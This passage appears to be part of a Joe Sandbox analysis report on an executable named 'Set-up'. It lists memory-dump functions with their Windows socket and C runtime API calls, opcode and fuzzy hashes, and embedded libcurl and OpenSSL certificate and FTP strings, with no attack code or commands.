                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: getsockname
                                    • String ID:
                                    • API String ID: 3358416759-0
                                    • Opcode ID: d450b055e4368b37f7ffb5d2be2184a4c2d02d7e6687cfcde41196b31e359a1e
                                    • Instruction ID: 851284d3978fd0705f1c5278d5e94fa5e307efc5e0e7ab5e7bec322d68863deb
                                    • Opcode Fuzzy Hash: d450b055e4368b37f7ffb5d2be2184a4c2d02d7e6687cfcde41196b31e359a1e
                                    • Instruction Fuzzy Hash: AA11967084878496EB268F1CD4027E6B3F8EFD0329F149619F9D942150F73299C5CBD2
                                    APIs
                                    • send.WS2_32(?,?,?,00000000), ref: 00D4A97E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: send
                                    • String ID:
                                    • API String ID: 2809346765-0
                                    • Opcode ID: c0bf07ae8749f67353e34353acd13cc62ea8371024093dd88e2be445575ae3cd
                                    • Instruction ID: 785db2eb8ed20f7381da3af94a481ad44ece408e350e43bf6bb8668d752ac674
                                    • Opcode Fuzzy Hash: c0bf07ae8749f67353e34353acd13cc62ea8371024093dd88e2be445575ae3cd
                                    • Instruction Fuzzy Hash: 1F01A275B00710AFC7248F19DC45B56BBA5EF84B21F0A825DFA986B361C331AC148FE1
                                    APIs
                                    • recv.WS2_32(000000FF,00D36F4E,000000FF,00000000), ref: 00D4A8AF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: recv
                                    • String ID:
                                    • API String ID: 1507349165-0
                                    • Opcode ID: 7c03aa6a55b1c149fc127b160820a88595bfc8582fa404d0bf537cf4087c10c7
                                    • Instruction ID: 6aa2d8923108a5ee58e118d234080928a53205d252cd22ec09db8faa25490da4
                                    • Opcode Fuzzy Hash: 7c03aa6a55b1c149fc127b160820a88595bfc8582fa404d0bf537cf4087c10c7
                                    • Instruction Fuzzy Hash: 87F01C72B447206BD5249A18EC05F9BF369EBC4B21F188909B954672488370BC4186F2
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: closesocket
                                    • String ID:
                                    • API String ID: 2781271927-0
                                    • Opcode ID: 5103fad25d9864d68de743ddaf0b412b807424ecf272d2644271fb8fb452dc82
                                    • Instruction ID: 5cfe6e350bc4846111378622e238d89acd5c80b50c00f765538666997deaaab3
                                    • Opcode Fuzzy Hash: 5103fad25d9864d68de743ddaf0b412b807424ecf272d2644271fb8fb452dc82
                                    • Instruction Fuzzy Hash: 6EE0C23470020097CE20CA18C888A47772B7FD1321F2CCB68E02C8A154CB3BDC43C711
                                    APIs
                                    • ioctlsocket.WS2_32(?,8004667E), ref: 00CE67FB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: ioctlsocket
                                    • String ID:
                                    • API String ID: 3577187118-0
                                    • Opcode ID: b46fe6738e0cca52e31aab8563e296ec4b2763d0a5f85f0b48e574f28afcaa6d
                                    • Instruction ID: b4dbb29dff53cb5c78a5f9d0bae928d33c2a7106771bb02529ca00e67aa0fa49
                                    • Opcode Fuzzy Hash: b46fe6738e0cca52e31aab8563e296ec4b2763d0a5f85f0b48e574f28afcaa6d
                                    • Instruction Fuzzy Hash: F6C012F5108200EFC7084B24D449A5E77EDEB48356F05441CB04AC2140DB749490CF16
                                    APIs
                                      • Part of subcall function 00D3A440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00D3A499
                                      • Part of subcall function 00D3A440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00D3A4FB
                                      • Part of subcall function 00D3A440: RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00D3AA19
                                      • Part of subcall function 00D39B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LOCALDOMAIN,00000000,00000000,?,0000000F,?,00D392A4,?,?,?,?,?,?,?,?,00000000), ref: 00D39B6E
                                      • Part of subcall function 00D39B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(RES_OPTIONS,?,?,?,?,?,?,?,?,00000000,?,0000000F,00D34860,00000000), ref: 00D39C24
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000F), ref: 00D393C3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: AdaptersAddressesgetenv$Openmemcpy
                                    • String ID:
                                    • API String ID: 1905038125-0
                                    • Opcode ID: 5c0a799c5328bc1d4a6fd231715550a4e296e86d22b6764342bd12e02078a7ce
                                    • Instruction ID: 64596d25f4bc25a7af999090ec752bd5aade0768557e9c2090460a287c627c5c
                                    • Opcode Fuzzy Hash: 5c0a799c5328bc1d4a6fd231715550a4e296e86d22b6764342bd12e02078a7ce
                                    • Instruction Fuzzy Hash: EB51B1B2904302ABD720DF24E89572AFBE4BF84354F0C052CF94983651E7B1E865DBB6
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,01156AB0,?,?,?,?,?,01156431), ref: 0115B701
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 31bd598d2e66af33275363c509d20d721eaa5d15897932ffc69e4b498b49e92d
                                    • Instruction ID: e3b4621ab6e9b8cc6943e82e34391a6bd6361863f756b25753fa9561712935ec
                                    • Opcode Fuzzy Hash: 31bd598d2e66af33275363c509d20d721eaa5d15897932ffc69e4b498b49e92d
                                    • Instruction Fuzzy Hash: 60D0A9B1D08B048BEB00BE6888C041A37E8BAA4214F84069EDEC41B242E339951487D2
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E37254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,00E340BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E5CBD2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: 5638ebd5281401686a4b6ac332aaf07d74d62452fd117ddc6a58924a46e2797d
                                    • Instruction ID: bcaab517f7a08e70139980d7235c87e6bc4d9f2a9554a381f33dd1145bd8c07c
                                    • Opcode Fuzzy Hash: 5638ebd5281401686a4b6ac332aaf07d74d62452fd117ddc6a58924a46e2797d
                                    • Instruction Fuzzy Hash: D0B09B664443019FE5565504B4934197251F6D0705FA45C31FA46D04B0D2129C58D546
                                    APIs
                                    • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Unknown error), ref: 00CF6E74
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00CF6F8A
                                    • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00CF7184
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00CF7263
                                    • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00CF75B8
                                      • Part of subcall function 00E4F870: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000800), ref: 00E4F8AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: memcpy$memcmpmemsetstrcpystrlen
                                    • String ID: Unable to load public key$ Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s$ SSL certificate issuer check ok (%s)$ SSL certificate verify ok.$ SSL certificate verify result: %s (%ld), continuing anyway.$ common name: %s (matched)$ expire date: %.*s$ issuer: %s$ start date: %.*s$ subject: %s$ subjectAltName does not match %s %s$ subjectAltName: host "%s" matched cert's "%s"$ subjectAltName: host "%s" matched cert's IP address!$%02x$%02x:$%lx$%s certificate:$%s/%s$/%s$: $<$BIO_new return NULL, OpenSSL error %s$BIO_new_mem_buf NULL, OpenSSL error %s$Cert$Could not find certificate ID in OCSP response$Could not get peer certificate chain$Error computing OCSP ID$Error getting peer certificate$Expire date$Invalid OCSP response$Invalid OCSP response status: %s (%d)$Issuer$No OCSP response received$No error$OCSP response has expired$OCSP response verification failed$OpenSSL$Proxy$Public Key Algorithm$RSA Public Key$Remove session ID again from cache$SSL certificate revocation reason: %s (%d)$SSL certificate status: %s (%d)$SSL certificate verify result: %s (%ld)$SSL: Certificate issuer check failed (%s)$SSL: Unable to open issuer cert (%s)$SSL: Unable to read issuer cert (%s)$SSL: certificate subject name '%s' does not match target hostname '%s'$SSL: could not get X509-issuer name$SSL: could not get peer certificate$SSL: illegal cert name field$SSL: no alternative certificate subject name matches target %s '%s'$SSL: public key does not match pinned public key$SSL: unable to obtain common name from peer certificate$Serial Number$Server$Signature$Signature Algorithm$Start date$Subject$Unknown error$Version$[NONE]$dsa$hostname$ipv4 address$ipv6 address$pqg$pub_key$rsa$unexpected ssl peer type: %d$vtls/openssl.c
                                    • API String ID: 838718518-248801092
                                    • Opcode ID: c9e52391a19c482b4261376bc0ac1097fab8ddb0b91c240a3919f46637110955
                                    • Instruction ID: 78c02d6c5b42bb7be166aa91526fa06d85b362063859fee954383701eb622720
                                    • Opcode Fuzzy Hash: c9e52391a19c482b4261376bc0ac1097fab8ddb0b91c240a3919f46637110955
                                    • Instruction Fuzzy Hash: 850327B2D083446BE761AB209C42F7B76D9AF91708F04452CFE4D66283F771AA54C7A3
                                    APIs
                                    • localeconv.MSVCRT ref: 0100E0B3
                                    • localeconv.MSVCRT ref: 0100E0BE
                                    • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0100E149
                                    • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0100E179
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0100E1D8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0100E1FA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0100E20F
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0100F886
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID: free$isspacelocaleconv$_errno
                                    • String ID: $d$nil)
                                    • API String ID: 577766270-394766432
                                    • Opcode ID: e933ca2da1fd8233fc9c6e07825e1b6ce5acda3837861a4b577516e4e4502025
                                    • Instruction ID: 0fdc2554b4f855a509dc48d4fd6f08c0094c1e5d5104c99ba23c98f19129ed77
                                    • Opcode Fuzzy Hash: e933ca2da1fd8233fc9c6e07825e1b6ce5acda3837861a4b577516e4e4502025
                                    • Instruction Fuzzy Hash: 26138C706083428FE762DF28C08066ABBE1BFC9314F144E6DEAD59B395D775E845CB82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$???$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$LIST$NLST$PORT$PRET$PRET %s$PRET RETR %s$PRET STOR %s$REST %d$RETR_PREQUOTE$STOP$[%s] -> [%s]$[%s] ftp_state_use_port(), listening on %d$[%s] ftp_state_use_port(), opened socket$[%s] ftp_state_use_port(), socket bound to port %d$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                                    • API String ID: 0-1921080684
                                    • Opcode ID: 8a6f6eedc9e075f2e64baa35fa91b9a62919812dac285627ba3fab77c4996245
                                    • Instruction ID: 30ea7c2a422666ee8cd1cb71b3f044abd0c6e78121b9b3cc4768715c4f951741
                                    • Opcode Fuzzy Hash: 8a6f6eedc9e075f2e64baa35fa91b9a62919812dac285627ba3fab77c4996245
                                    • Instruction Fuzzy Hash: 02521471604300ABE725DB25DC85FAB7BE9AF82304F08492DF895C7292E770DE45C7A2
                                    APIs
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 00C8E6F1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
